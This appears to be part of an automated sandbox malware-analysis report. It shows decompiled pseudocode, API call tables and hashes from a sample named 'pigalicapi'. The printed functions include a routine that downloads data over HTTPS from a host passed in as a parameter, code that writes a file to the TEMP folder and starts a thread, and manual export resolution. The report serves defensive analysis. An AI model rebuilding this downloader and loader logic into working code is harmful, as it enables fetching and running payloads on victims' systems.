                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        						E024E2510(_v40, 0x24ee290);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}


































                                                                                                                                                                                                                                                                                                        0x024e6dac
                                                                                                                                                                                                                                                                                                        0x024e6db3
                                                                                                                                                                                                                                                                                                        0x024e723f
                                                                                                                                                                                                                                                                                                        0x024e7244
                                                                                                                                                                                                                                                                                                        0x024e7244
                                                                                                                                                                                                                                                                                                        0x024e6dc9
                                                                                                                                                                                                                                                                                                        0x024e6dd1
                                                                                                                                                                                                                                                                                                        0x024e6ddc
                                                                                                                                                                                                                                                                                                        0x024e6de5
                                                                                                                                                                                                                                                                                                        0x024e6dee
                                                                                                                                                                                                                                                                                                        0x024e6df7
                                                                                                                                                                                                                                                                                                        0x024e6e00
                                                                                                                                                                                                                                                                                                        0x024e6e09
                                                                                                                                                                                                                                                                                                        0x024e6e15
                                                                                                                                                                                                                                                                                                        0x024e7028
                                                                                                                                                                                                                                                                                                        0x024e7039
                                                                                                                                                                                                                                                                                                        0x024e704a
                                                                                                                                                                                                                                                                                                        0x024e704f
                                                                                                                                                                                                                                                                                                        0x024e7077
                                                                                                                                                                                                                                                                                                        0x024e7099
                                                                                                                                                                                                                                                                                                        0x024e70a6
                                                                                                                                                                                                                                                                                                        0x024e70ac
                                                                                                                                                                                                                                                                                                        0x024e70b6
                                                                                                                                                                                                                                                                                                        0x024e70c6
                                                                                                                                                                                                                                                                                                        0x024e70d5
                                                                                                                                                                                                                                                                                                        0x024e71af
                                                                                                                                                                                                                                                                                                        0x024e70db
                                                                                                                                                                                                                                                                                                        0x024e70eb
                                                                                                                                                                                                                                                                                                        0x024e7107
                                                                                                                                                                                                                                                                                                        0x024e7114
                                                                                                                                                                                                                                                                                                        0x024e713d
                                                                                                                                                                                                                                                                                                        0x024e7163
                                                                                                                                                                                                                                                                                                        0x024e716f
                                                                                                                                                                                                                                                                                                        0x024e716f
                                                                                                                                                                                                                                                                                                        0x024e7183
                                                                                                                                                                                                                                                                                                        0x024e7183
                                                                                                                                                                                                                                                                                                        0x024e7189
                                                                                                                                                                                                                                                                                                        0x024e71bc
                                                                                                                                                                                                                                                                                                        0x024e71c9
                                                                                                                                                                                                                                                                                                        0x024e71e0
                                                                                                                                                                                                                                                                                                        0x024e71e5
                                                                                                                                                                                                                                                                                                        0x024e71e8
                                                                                                                                                                                                                                                                                                        0x024e71f5
                                                                                                                                                                                                                                                                                                        0x024e71fe
                                                                                                                                                                                                                                                                                                        0x024e7212
                                                                                                                                                                                                                                                                                                        0x024e7217
                                                                                                                                                                                                                                                                                                        0x024e7217
                                                                                                                                                                                                                                                                                                        0x024e7223
                                                                                                                                                                                                                                                                                                        0x024e7231
                                                                                                                                                                                                                                                                                                        0x024e7236
                                                                                                                                                                                                                                                                                                        0x024e7223
                                                                                                                                                                                                                                                                                                        0x024e71f5
                                                                                                                                                                                                                                                                                                        0x024e71c9
                                                                                                                                                                                                                                                                                                        0x024e7239
                                                                                                                                                                                                                                                                                                        0x024e7239
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e7239
                                                                                                                                                                                                                                                                                                        0x024e6e1b
                                                                                                                                                                                                                                                                                                        0x024e6e22
                                                                                                                                                                                                                                                                                                        0x024e6e29
                                                                                                                                                                                                                                                                                                        0x024e6e39
                                                                                                                                                                                                                                                                                                        0x024e6eec
                                                                                                                                                                                                                                                                                                        0x024e6ef1
                                                                                                                                                                                                                                                                                                        0x024e6ef4
                                                                                                                                                                                                                                                                                                        0x024e6e3f
                                                                                                                                                                                                                                                                                                        0x024e6e4f
                                                                                                                                                                                                                                                                                                        0x024e6e65
                                                                                                                                                                                                                                                                                                        0x024e6e6c
                                                                                                                                                                                                                                                                                                        0x024e6e8c
                                                                                                                                                                                                                                                                                                        0x024e6e92
                                                                                                                                                                                                                                                                                                        0x024e6e97
                                                                                                                                                                                                                                                                                                        0x024e6e9a
                                                                                                                                                                                                                                                                                                        0x024e6ea6
                                                                                                                                                                                                                                                                                                        0x024e6ebb
                                                                                                                                                                                                                                                                                                        0x024e6eca
                                                                                                                                                                                                                                                                                                        0x024e6ecf
                                                                                                                                                                                                                                                                                                        0x024e6ecf
                                                                                                                                                                                                                                                                                                        0x024e6ea6
                                                                                                                                                                                                                                                                                                        0x024e6edd
                                                                                                                                                                                                                                                                                                        0x024e6edd
                                                                                                                                                                                                                                                                                                        0x024e6ee3
                                                                                                                                                                                                                                                                                                        0x024e6efb
                                                                                                                                                                                                                                                                                                        0x024e7012
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6f01
                                                                                                                                                                                                                                                                                                        0x024e6f08
                                                                                                                                                                                                                                                                                                        0x024e6f1c
                                                                                                                                                                                                                                                                                                        0x024e6f21
                                                                                                                                                                                                                                                                                                        0x024e6f21
                                                                                                                                                                                                                                                                                                        0x024e6f2d
                                                                                                                                                                                                                                                                                                        0x024e6f35
                                                                                                                                                                                                                                                                                                        0x024e6f3a
                                                                                                                                                                                                                                                                                                        0x024e6f3d
                                                                                                                                                                                                                                                                                                        0x024e6f49
                                                                                                                                                                                                                                                                                                        0x024e6f55
                                                                                                                                                                                                                                                                                                        0x024e6f83
                                                                                                                                                                                                                                                                                                        0x024e6f8b
                                                                                                                                                                                                                                                                                                        0x024e6fa1
                                                                                                                                                                                                                                                                                                        0x024e6fa6
                                                                                                                                                                                                                                                                                                        0x024e6fb2
                                                                                                                                                                                                                                                                                                        0x024e6fb2
                                                                                                                                                                                                                                                                                                        0x024e6f57
                                                                                                                                                                                                                                                                                                        0x024e6f5d
                                                                                                                                                                                                                                                                                                        0x024e6f65
                                                                                                                                                                                                                                                                                                        0x024e6f65
                                                                                                                                                                                                                                                                                                        0x024e6fbb
                                                                                                                                                                                                                                                                                                        0x024e6fc6
                                                                                                                                                                                                                                                                                                        0x024e6fcf
                                                                                                                                                                                                                                                                                                        0x024e6fe9
                                                                                                                                                                                                                                                                                                        0x024e6ff0
                                                                                                                                                                                                                                                                                                        0x024e6ff0
                                                                                                                                                                                                                                                                                                        0x024e6fbb
                                                                                                                                                                                                                                                                                                        0x024e6fff
                                                                                                                                                                                                                                                                                                        0x024e700a
                                                                                                                                                                                                                                                                                                        0x024e700f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e6fff

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 024E6DC9
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 024E6DD1
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E6E5F
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 024E6EB5
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 024E6EDD
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 024E6F7A
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 024E6FE3
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 024E6FF0
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 024E7028
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 024E7059
                                                                                                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 024E7077
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 024E7093
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 024E7101
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 024E715D
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 024E7183
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 024E71A9
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 024E71BC
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 024E7239
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                                                        • String ID: TEMP
                                                                                                                                                                                                                                                                                                        • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                                                        • Opcode ID: b7cea11dadef9d3a40ec9fde38666430fe7c89295f6ff45fae73225b9630630e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 14d41e2f2cb2baa49569bb4af3de243610aa1c42e8ba24806414e5d6ec32d15d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7cea11dadef9d3a40ec9fde38666430fe7c89295f6ff45fae73225b9630630e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53F12B75E00208EFEB18DF94D984FAEB7B5BB48305F208599E50AAB381D771AE41CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E2900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				CHAR* _v28;
                                                                                                                                                                                                                                                                                                        				char _v292;
                                                                                                                                                                                                                                                                                                        				void _v296;
                                                                                                                                                                                                                                                                                                        				void* _v300;
                                                                                                                                                                                                                                                                                                        				long _v304;
                                                                                                                                                                                                                                                                                                        				long _v308;
                                                                                                                                                                                                                                                                                                        				char* _t54;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                                        					_t54 =  *0x24ee004; // 0x24ec398
                                                                                                                                                                                                                                                                                                        					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x24ec3d2, 0x24ec3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                                                        						if(_v16 != 0) {
                                                                                                                                                                                                                                                                                                        							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                                                        							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                                        								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                                                        								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                                                        								_v24 = 4;
                                                                                                                                                                                                                                                                                                        								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                                                        								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                                                        								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                                                        								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                                                        									_v308 = GetLastError();
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_v300 = 0;
                                                                                                                                                                                                                                                                                                        									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                                                        										_v304 = 0;
                                                                                                                                                                                                                                                                                                        										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                                                        										if(_v304 != 0) {
                                                                                                                                                                                                                                                                                                        											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                                                        											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										break;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_v8 = _v300;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                                                                        0x024e2909
                                                                                                                                                                                                                                                                                                        0x024e2914
                                                                                                                                                                                                                                                                                                        0x024e2936
                                                                                                                                                                                                                                                                                                        0x024e2942
                                                                                                                                                                                                                                                                                                        0x024e2949
                                                                                                                                                                                                                                                                                                        0x024e2972
                                                                                                                                                                                                                                                                                                        0x024e2979
                                                                                                                                                                                                                                                                                                        0x024e29a3
                                                                                                                                                                                                                                                                                                        0x024e29aa
                                                                                                                                                                                                                                                                                                        0x024e29c0
                                                                                                                                                                                                                                                                                                        0x024e29c9
                                                                                                                                                                                                                                                                                                        0x024e29d0
                                                                                                                                                                                                                                                                                                        0x024e29e8
                                                                                                                                                                                                                                                                                                        0x024e29f9
                                                                                                                                                                                                                                                                                                        0x024e2a0e
                                                                                                                                                                                                                                                                                                        0x024e2a33
                                                                                                                                                                                                                                                                                                        0x024e2ab5
                                                                                                                                                                                                                                                                                                        0x024e2a35
                                                                                                                                                                                                                                                                                                        0x024e2a35
                                                                                                                                                                                                                                                                                                        0x024e2a3f
                                                                                                                                                                                                                                                                                                        0x024e2a4a
                                                                                                                                                                                                                                                                                                        0x024e2a73
                                                                                                                                                                                                                                                                                                        0x024e2a80
                                                                                                                                                                                                                                                                                                        0x024e2a90
                                                                                                                                                                                                                                                                                                        0x024e2a9f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2a82
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e2a80
                                                                                                                                                                                                                                                                                                        0x024e2aaa
                                                                                                                                                                                                                                                                                                        0x024e2aaa
                                                                                                                                                                                                                                                                                                        0x024e2acb
                                                                                                                                                                                                                                                                                                        0x024e2acb
                                                                                                                                                                                                                                                                                                        0x024e2ad5
                                                                                                                                                                                                                                                                                                        0x024e2ad5
                                                                                                                                                                                                                                                                                                        0x024e2adf
                                                                                                                                                                                                                                                                                                        0x024e2adf
                                                                                                                                                                                                                                                                                                        0x024e2949
                                                                                                                                                                                                                                                                                                        0x024e2aeb

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(024EC398,00000001,00000000,00000000,00000000), ref: 024E293C
                                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,00000000,000001BB,024EC3D2,024EC3D1,00000003,00000000,00000000), ref: 024E296C
                                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,GET,024EC3D8,1.1,00000000,00000000,80800000,00000000), ref: 024E299D
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 024E29C0
                                                                                                                                                                                                                                                                                                        • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 024E29E8
                                                                                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 024E2A0E
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(024EC3EC,00000000,00000000), ref: 024E2A1C
                                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,024EC3EC,00000000), ref: 024E2A2B
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 024E2A73
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 024E2AAF
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 024E2ACB
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 024E2AD5
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 024E2ADF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: 1.1$GET$https://%s
                                                                                                                                                                                                                                                                                                        • API String ID: 2082764430-1670984264
                                                                                                                                                                                                                                                                                                        • Opcode ID: 163070a502a5bdbd602e600b9acbf2988d33f8b247e6446a9d78c56fca28cf4c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3f2a73fed45e1b7f6004432fc4d681ce792a8a62b4bb579f04b00d6f6f36d29a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 163070a502a5bdbd602e600b9acbf2988d33f8b247e6446a9d78c56fca28cf4c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C511F71940218EFFF24DF94DC89BEEB7B5AB48705F10458AF906A6280C7B49A94CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E35E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                                                                        				char _v532;
                                                                                                                                                                                                                                                                                                        				void* _v536;
                                                                                                                                                                                                                                                                                                        				long _v540;
                                                                                                                                                                                                                                                                                                        				void* _v544;
                                                                                                                                                                                                                                                                                                        				long _v548;
                                                                                                                                                                                                                                                                                                        				CHAR* _v552;
                                                                                                                                                                                                                                                                                                        				void* _v556;
                                                                                                                                                                                                                                                                                                        				int _v560;
                                                                                                                                                                                                                                                                                                        				char _v820;
                                                                                                                                                                                                                                                                                                        				CHAR* _v824;
                                                                                                                                                                                                                                                                                                        				char _v1084;
                                                                                                                                                                                                                                                                                                        				signed char _v1085;
                                                                                                                                                                                                                                                                                                        				long _v1092;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1096;
                                                                                                                                                                                                                                                                                                        				long _t124;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        					E024E2E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                                                        					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                                                                        						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                                        						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                                                                        							if(_v540 > 0) {
                                                                                                                                                                                                                                                                                                        								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        								_t155 = _v544;
                                                                                                                                                                                                                                                                                                        								if(_v544 != 0) {
                                                                                                                                                                                                                                                                                                        									_v548 = 0;
                                                                                                                                                                                                                                                                                                        									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                                                                        									_v556 = E024E3370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                                                                        									_v552 = E024E3580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                                                                        									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                                                                        									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                                                                        										_v824 = _v552;
                                                                                                                                                                                                                                                                                                        										_v1085 = 0;
                                                                                                                                                                                                                                                                                                        										E024E2E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                                                                        										E024E2E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                                                                        										_v1092 = 0;
                                                                                                                                                                                                                                                                                                        										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                                                                        											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                                                                        													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                                                                        													__eflags = _t124;
                                                                                                                                                                                                                                                                                                        													_v1092 = _t124;
                                                                                                                                                                                                                                                                                                        													continue;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                                                                        													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                                                                        													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                                                                        													_v1085 = 1;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											break;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        											_v8 = E024E35E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                                                                        										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                                                                        										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							CloseHandle(_v536);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}




















                                                                                                                                                                                                                                                                                                        0x024e35e9
                                                                                                                                                                                                                                                                                                        0x024e35fa
                                                                                                                                                                                                                                                                                                        0x024e3601
                                                                                                                                                                                                                                                                                                        0x024e3615
                                                                                                                                                                                                                                                                                                        0x024e3635
                                                                                                                                                                                                                                                                                                        0x024e3657
                                                                                                                                                                                                                                                                                                        0x024e3664
                                                                                                                                                                                                                                                                                                        0x024e3679
                                                                                                                                                                                                                                                                                                        0x024e3686
                                                                                                                                                                                                                                                                                                        0x024e36a2
                                                                                                                                                                                                                                                                                                        0x024e36a8
                                                                                                                                                                                                                                                                                                        0x024e36af
                                                                                                                                                                                                                                                                                                        0x024e36b5
                                                                                                                                                                                                                                                                                                        0x024e36dd
                                                                                                                                                                                                                                                                                                        0x024e36f9
                                                                                                                                                                                                                                                                                                        0x024e3712
                                                                                                                                                                                                                                                                                                        0x024e3725
                                                                                                                                                                                                                                                                                                        0x024e3732
                                                                                                                                                                                                                                                                                                        0x024e374e
                                                                                                                                                                                                                                                                                                        0x024e3754
                                                                                                                                                                                                                                                                                                        0x024e3769
                                                                                                                                                                                                                                                                                                        0x024e377f
                                                                                                                                                                                                                                                                                                        0x024e3787
                                                                                                                                                                                                                                                                                                        0x024e37a2
                                                                                                                                                                                                                                                                                                        0x024e37c6
                                                                                                                                                                                                                                                                                                        0x024e37e0
                                                                                                                                                                                                                                                                                                        0x024e37f2
                                                                                                                                                                                                                                                                                                        0x024e3799
                                                                                                                                                                                                                                                                                                        0x024e3799
                                                                                                                                                                                                                                                                                                        0x024e379c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e37f4
                                                                                                                                                                                                                                                                                                        0x024e380c
                                                                                                                                                                                                                                                                                                        0x024e381e
                                                                                                                                                                                                                                                                                                        0x024e383c
                                                                                                                                                                                                                                                                                                        0x024e3842
                                                                                                                                                                                                                                                                                                        0x024e3842
                                                                                                                                                                                                                                                                                                        0x024e37f2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e37c6
                                                                                                                                                                                                                                                                                                        0x024e385d
                                                                                                                                                                                                                                                                                                        0x024e3875
                                                                                                                                                                                                                                                                                                        0x024e3875
                                                                                                                                                                                                                                                                                                        0x024e385d
                                                                                                                                                                                                                                                                                                        0x024e387c
                                                                                                                                                                                                                                                                                                        0x024e3893
                                                                                                                                                                                                                                                                                                        0x024e38a2
                                                                                                                                                                                                                                                                                                        0x024e38a2
                                                                                                                                                                                                                                                                                                        0x024e38b3
                                                                                                                                                                                                                                                                                                        0x024e38c7
                                                                                                                                                                                                                                                                                                        0x024e38c7
                                                                                                                                                                                                                                                                                                        0x024e36af
                                                                                                                                                                                                                                                                                                        0x024e38d4
                                                                                                                                                                                                                                                                                                        0x024e38d4
                                                                                                                                                                                                                                                                                                        0x024e3664
                                                                                                                                                                                                                                                                                                        0x024e3635
                                                                                                                                                                                                                                                                                                        0x024e38e0

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 024E35F4
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 024E362D
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 024E3651
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 024E3673
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E369C
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 024E36DD
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 024E371F
                                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(?,?,-00000001), ref: 024E380C
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,.dll), ref: 024E381E
                                                                                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 024E383C
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 024E38B3
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E38C7
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 024E38D4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
